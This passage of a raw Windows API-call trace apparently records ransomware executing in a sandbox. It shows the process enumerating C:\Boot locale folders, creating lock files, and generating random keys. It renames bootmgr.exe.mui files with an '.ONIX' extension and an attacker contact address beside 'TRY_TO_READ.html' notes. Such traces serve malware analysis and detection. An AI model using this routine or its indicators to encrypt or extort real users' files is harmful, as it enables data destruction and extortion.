lpString2="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui") returned="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui" [0065.391] lstrcatW (in: lpString1="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\cs-CZ\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.391] GetProcessHeap () returned 0x410000 [0065.391] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.391] CloseHandle (hObject=0xffffffff) returned 0 [0065.391] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.391] FindNextFileW (in: hFindFile=0x447d68, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309226b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309226b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309226b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.391] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.391] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.391] GetLastError () returned 0x6 [0065.391] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.391] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.391] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.391] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.391] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.391] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.391] FindNextFileW (in: hFindFile=0x447d68, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309226b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309226b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309226b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.391] CloseHandle (hObject=0x3cc) returned 1 [0065.392] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.392] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x22)) [0065.392] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.392] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.392] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.392] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\da-DK9c354ca09c354b444c.lock") returned 37 [0065.392] CreateFileW (lpFileName="C:\\\\Boot\\da-DK9c354ca09c354b444c.lock" (normalized: "c:\\boot\\da-dk9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.393] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.393] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.393] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.393] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.393] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cb08 | out: hHeap=0x410000) returned 1 [0065.393] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cb30 | out: hHeap=0x410000) returned 1 [0065.393] FindFirstFileW (in: lpFileName="C:\\\\Boot\\da-DK\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309226b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309226b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x447da8 [0065.393] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.393] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.393] GetLastError () returned 0x0 [0065.393] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.393] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.393] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.393] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cb08 [0065.393] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447de8 [0065.394] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447de8 | out: hHeap=0x410000) returned 1 [0065.394] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.394] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.394] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cb08 | out: hHeap=0x410000) returned 1 [0065.394] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.394] FindNextFileW (in: hFindFile=0x447da8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309226b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309226b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.394] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.394] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.394] GetLastError () returned 0x0 [0065.394] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.394] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.394] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.394] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cb08 [0065.394] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447de8 [0065.394] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447de8 | out: hHeap=0x410000) returned 1 [0065.394] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.394] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.394] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cb08 | out: hHeap=0x410000) returned 1 [0065.394] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.394] FindNextFileW (in: hFindFile=0x447da8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.394] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.394] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.394] GetLastError () returned 0x0 [0065.394] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cb08 [0065.394] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.394] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.394] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.394] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.394] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cb08 | out: hHeap=0x410000) returned 1 [0065.394] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.394] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x487dd0 [0065.394] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.394] CreateFileW (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.395] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.395] CreateFileW (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.395] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.395] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x487dd0 | out: pbBuffer=0x487dd0) returned 1 [0065.395] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4665c8 | out: pbBuffer=0x4665c8) returned 1 [0065.395] SetFileAttributesW (lpFileName="C:\\\\Boot\\da-DK\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.395] lstrlenW (lpString="C:\\\\Boot\\da-DK\\bootmgr.exe.mui") returned 30 [0065.395] GetProcessHeap () returned 0x410000 [0065.395] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.395] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\da-DK\\bootmgr.exe.mui") returned="C:\\\\Boot\\da-DK\\bootmgr.exe.mui" [0065.395] lstrcatW (in: lpString1="C:\\\\Boot\\da-DK\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\da-DK\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.395] GetProcessHeap () returned 0x410000 [0065.395] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.395] CloseHandle (hObject=0xffffffff) returned 0 [0065.395] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.395] FindNextFileW (in: hFindFile=0x447da8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309226b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309226b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309226b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.395] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.395] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.395] GetLastError () returned 0x6 [0065.396] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.396] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.396] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.396] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.396] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.396] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.396] FindNextFileW (in: hFindFile=0x447da8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309226b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309226b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309226b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.396] CloseHandle (hObject=0x3cc) returned 1 [0065.396] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.396] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x22)) [0065.396] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.396] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.396] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.397] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\de-DE9c354ca09c354b444c.lock") returned 37 [0065.397] CreateFileW (lpFileName="C:\\\\Boot\\de-DE9c354ca09c354b444c.lock" (normalized: "c:\\boot\\de-de9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.397] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.397] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.397] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.397] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.397] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cb58 | out: hHeap=0x410000) returned 1 [0065.397] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cb80 | out: hHeap=0x410000) returned 1 [0065.397] FindFirstFileW (in: lpFileName="C:\\\\Boot\\de-DE\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309226b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309226b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x447de8 [0065.398] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.398] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.398] GetLastError () returned 0x0 [0065.398] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.398] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.398] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.398] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cb58 [0065.398] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447e28 [0065.398] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447e28 | out: hHeap=0x410000) returned 1 [0065.398] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.398] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.398] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cb58 | out: hHeap=0x410000) returned 1 [0065.398] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.398] FindNextFileW (in: hFindFile=0x447de8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309226b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309226b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.398] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.398] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.398] GetLastError () returned 0x0 [0065.398] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.398] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.398] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.398] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cb58 [0065.398] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447e28 [0065.398] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447e28 | out: hHeap=0x410000) returned 1 [0065.398] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.398] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.398] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cb58 | out: hHeap=0x410000) returned 1 [0065.398] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.398] FindNextFileW (in: hFindFile=0x447de8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.398] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.398] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.398] GetLastError () returned 0x0 [0065.398] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cb58 [0065.398] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.398] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.399] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.399] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.399] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cb58 | out: hHeap=0x410000) returned 1 [0065.399] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.399] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x488ee0 [0065.399] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665d8 [0065.399] CreateFileW (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.399] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.399] CreateFileW (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.399] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.399] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x488ee0 | out: pbBuffer=0x488ee0) returned 1 [0065.399] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4665d8 | out: pbBuffer=0x4665d8) returned 1 [0065.399] SetFileAttributesW (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.399] lstrlenW (lpString="C:\\\\Boot\\de-DE\\bootmgr.exe.mui") returned 30 [0065.399] GetProcessHeap () returned 0x410000 [0065.400] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.400] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\de-DE\\bootmgr.exe.mui") returned="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" [0065.400] lstrcatW (in: lpString1="C:\\\\Boot\\de-DE\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.400] GetProcessHeap () returned 0x410000 [0065.400] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.400] CloseHandle (hObject=0xffffffff) returned 0 [0065.400] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.400] FindNextFileW (in: hFindFile=0x447de8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309226b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309226b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309226b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.400] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.400] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.400] GetLastError () returned 0x6 [0065.400] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.400] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.400] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.400] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.400] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.400] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.400] FindNextFileW (in: hFindFile=0x447de8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309226b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309226b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, 